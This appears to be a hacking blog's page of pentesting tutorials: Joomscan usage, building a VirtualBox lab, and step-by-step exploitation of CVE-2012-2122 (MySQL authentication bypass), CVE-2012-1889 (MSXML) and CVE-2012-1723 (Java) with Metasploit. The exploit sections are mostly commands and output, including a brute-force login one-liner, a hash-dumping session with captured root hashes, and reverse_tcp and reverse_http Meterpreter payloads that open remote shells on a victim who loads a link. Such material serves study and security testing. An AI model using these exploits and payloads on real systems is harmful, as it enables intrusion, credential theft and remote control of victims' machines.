
Showing posts with label Pentesting Tutorials. Show all posts

Sunday, 1 September 2013

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux

Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated
version can detect 550 vulnerabilities. Let me show how to use Joomscan in Backtrack 5.

Download the Joomscan from here

Step 1: Moving to the PenTest folder
Copy or move the downloaded files into the directory /pentest/web/scanners/joomscan/


Step 2: Set Permission
Now you have to make the Joomscan script executable. To do this, type the following command in the Terminal (if you don't know how to open a terminal at all, please stop reading this and start from the basics of Linux):
chmod 0777 joomscan.pl
Note that only the execute bit is needed; mode 0777 also makes the script world-writable.


Step 3: Update
Update the scanner to latest version. To do this, enter the following command in Terminal:
./joomscan.pl update


Step 4: Scanning for Vulnerability
Now that everything is set up, we can scan our Joomla site for vulnerabilities. To do this, enter the following command in the Terminal:
./joomscan.pl -u www.YourJoomlasite.com




Wait a while and it will list the vulnerabilities found.

This tutorial is completely for educational purposes only. It is intended for pentesters and ethical hackers.

LIKE OUR FACEBOOK PAGE AND JOIN OUR SITE TO GET LATEST HACKS UPDATES

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

Hi BTS readers, we have provided you with plenty of ethical hacking and pentesting tutorials, and more articles are on the way. Meanwhile, I would like to teach you how to set up your own pentesting lab network.

Uses of your own pentesting lab:
  • Free, free, free! It's a free lab, because it is yours.
  • Only one system is needed
  • You can practice your pentesting/hacking skills
  • You can install any kind of malware (spyware, trojans) or RATs and test how it works
  • and more...
Is it possible to create a lab with a single system?
Yes, you can. We are going to set up a lot of vulnerable systems virtually. Confused? VirtualBox is open source software provided by Oracle that allows you to run multiple guest OSes (virtual systems) on a single system.

Requirements:
  • VirtualBox latest version and its extension pack (get it from here: www.virtualbox.org/)
  • Windows XP image file (xp.iso); it is going to be our target system
  • Backtrack Linux image file (backtrack5.iso); we are going to launch the attack from this OS.
First of all, learn how to configure a guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will explain everything about VirtualBox and how to set up a guest OS.

I hope you are now familiar with installing a guest OS.

Set up your target system: Now we have to set up the target system. Install Windows XP in VirtualBox using the xp.iso file. After the installation is complete, disable the firewall in XP so that it becomes a more vulnerable system.

Set up your pentesting system: Install Backtrack 5 in VirtualBox. Backtrack is a penetration testing Linux distribution that comes with a lot of hacking tools. We will hack the target system from this Backtrack.

Network settings for the guest OS:
Step 1:
Click the File menu in VirtualBox and select Preferences.
Now select the Network tab.
Click the + symbol at the side; that will add a new host-only network.

Step 2:

Right-click on the guest OS (e.g. XP, Backtrack) and select Settings.
Select the Network tab.
Now you can see the "Attached to" option menu.
Change it from NAT to "Host-only Adapter".
Do the same thing for both guest OSes. Host-only networking keeps both guests off your real network, which matters because the XP target has its firewall disabled.

Step 3:

Now run both guest OSes.
Finding the IP address of the target system: Open the Windows XP guest OS window.
Open cmd in Windows XP and type ipconfig.
This will show the IP address of XP. It will be 192.168.56.101

Hacking with the pentesting system:
Open the Terminal and type "nmap 192.168.56.101".
Now it will show the list of open ports.

You can hack the target system through its open ports.
Let me explain more details in my next article.

If you have trouble installing or are confused, comment here.


CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB

The news about the vulnerability in MySQL and MariaDB spread like wildfire. I have covered this vulnerability on E Hacking News as a news article. Here, I am going to share the same thing from the perspective of a penetration tester.

MySQL and MariaDB versions 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are the affected versions.

The vulnerability allows an attacker to access a MySQL database without supplying proper authentication credentials. It can only be exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range: the comparison result is returned through a char-sized my_bool, so a return value such as 256 is truncated to 0 and treated as a successful password match.

According to Golubchik, the gcc built-in memcmp and the BSD libc are safe, but the Linux glibc SSE-optimised memcmp is not.
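The narrowing described above, as an added illustration in C that is not from the original post: check_scramble() returns its comparison result through MySQL's char-sized my_bool, so any memcmp result that is a non-zero multiple of 256 is truncated to 0 and read as a correct password. The simulated memcmp (byte-wise versus 16-bit word-wise) and the all-zero hash are constructed for the demonstration.

```c
#include <stdio.h>

typedef char my_bool;   /* MySQL's my_bool: an int returned through it keeps only its low 8 bits */
#define SHA1_HASH_SIZE 20

/* Constructed memcmp that compares `width`-byte big-endian words (width 1 = the plain byte
 * difference; width 2 = an optimised routine). The C standard only fixes the sign of the
 * result, so both are legal, but with width 2 the result is a multiple of 256 whenever the
 * mismatching words agree in their low byte. */
static int sim_memcmp(const unsigned char *a, const unsigned char *b, size_t n, int width)
{
    for (size_t i = 0; i + width <= n; i += width) {
        int wa = 0, wb = 0;
        for (int k = 0; k < width; k++) { wa = (wa << 8) | a[i + k]; wb = (wb << 8) | b[i + k]; }
        if (wa != wb) return wa - wb;
    }
    return 0;
}

/* check_scramble() returns 0 for "password OK". Vulnerable shape: the int from the
 * comparison is narrowed to my_bool, so 256, 512, ... become 0 (the cast is explicit here;
 * MySQL's was implicit). */
static my_bool check_scramble_vuln(const unsigned char *h, const unsigned char *r, int width)
{
    return (my_bool)sim_memcmp(h, r, SHA1_HASH_SIZE, width);
}

/* Fixed shape: normalise to 0/1 before any narrowing, as the upstream fix does. */
static my_bool check_scramble_fixed(const unsigned char *h, const unsigned char *r, int width)
{
    return sim_memcmp(h, r, SHA1_HASH_SIZE, width) != 0;
}

/* Try every wrong reply differing in its first two bytes against an all-zero (constructed)
 * hash and count how many the chosen check wrongly accepts. */
static int false_accepts(int fixed, int width)
{
    unsigned char hash[SHA1_HASH_SIZE] = {0}, reply[SHA1_HASH_SIZE] = {0};
    int bad = 0;
    for (int i = 0; i < 256; i++)
        for (int j = (i == 0); j < 256; j++) {   /* (0,0) is the one genuine match */
            reply[0] = (unsigned char)i; reply[1] = (unsigned char)j;
            my_bool res = fixed ? check_scramble_fixed(hash, reply, width)
                                : check_scramble_vuln(hash, reply, width);
            if (res == 0) bad++;
        }
    return bad;
}

int main(void)
{
    printf("vulnerable check, byte-wise memcmp: %d false accepts\n", false_accepts(0, 1));
    printf("vulnerable check, word-wise memcmp: %d false accepts\n", false_accepts(0, 2));
    printf("fixed check,      word-wise memcmp: %d false accepts\n", false_accepts(1, 2));
    return 0;
}
```

The same vulnerable check accepts nothing wrong with the byte-wise comparison and 255 wrong replies with the word-wise one, which is why only builds using certain memcmp implementations were affected.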

Not all Linux distros are affected; only the following systems are vulnerable:
* Ubuntu Linux 64-bit (10.04, 11.10, 11.04, 12.04)
* openSUSE 12.1 64-bit, MySQL 5.5.23-log
* Debian Unstable 64-bit, 5.5.23.2
* Fedora
* Arch Linux

To test for the vulnerability, run the following bash one-liner:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

The above command will provide access to an affected MySQL server as the root user account.

The following video was provided by one of the EHN readers:


Exploiting using Metasploit:
One of the Metasploit contributors committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot:

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Credit Zoombie Hacker

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo

CVE-2012-1889: Microsoft XML Core Services Vulnerability 


A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can get the full list. 
-----------------------------------------------------------------------------------------------------------------------------------------------------------
The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
-----------------------------------------------------------------------------------------------------------------------------------------------------------
I am going to demonstrate how to use the Metasploit tool to test whether your network is vulnerable or not.

Open the Terminal and type "msfupdate" to get the latest Metasploit modules. Once the update is finished, type "msfconsole".

Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".

Now we have to know the list of settings available for this exploit module. To get the list, type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here 192.168.56.10 is the IP of Backtrack. You can get this IP by simply typing "ifconfig" in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use the reverse TCP payload for this attack too. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.


Once the victim loads the URL in his IE browser, you will get the following message in your Metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP
[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)

Type "sessions" to list the active sessions. Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter.

Type "sysinfo" in the meterpreter to get the system information.


Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution



CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirements:

  • Attacker machine: Backtrack
  • Victim machine: Windows (with an unpatched JRE installed)
Step 1: Launch the Metasploit console
Open the Terminal in the attacker machine (Backtrack).
Type "msfupdate"; this will update Metasploit with the latest modules.
Now type "msfconsole" to interact with the Metasploit Framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the commands below:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit



Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the URL and open the link in the victim machine. Once the URL is loaded in the victim machine, it will launch the exploit and create a new session.

Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:

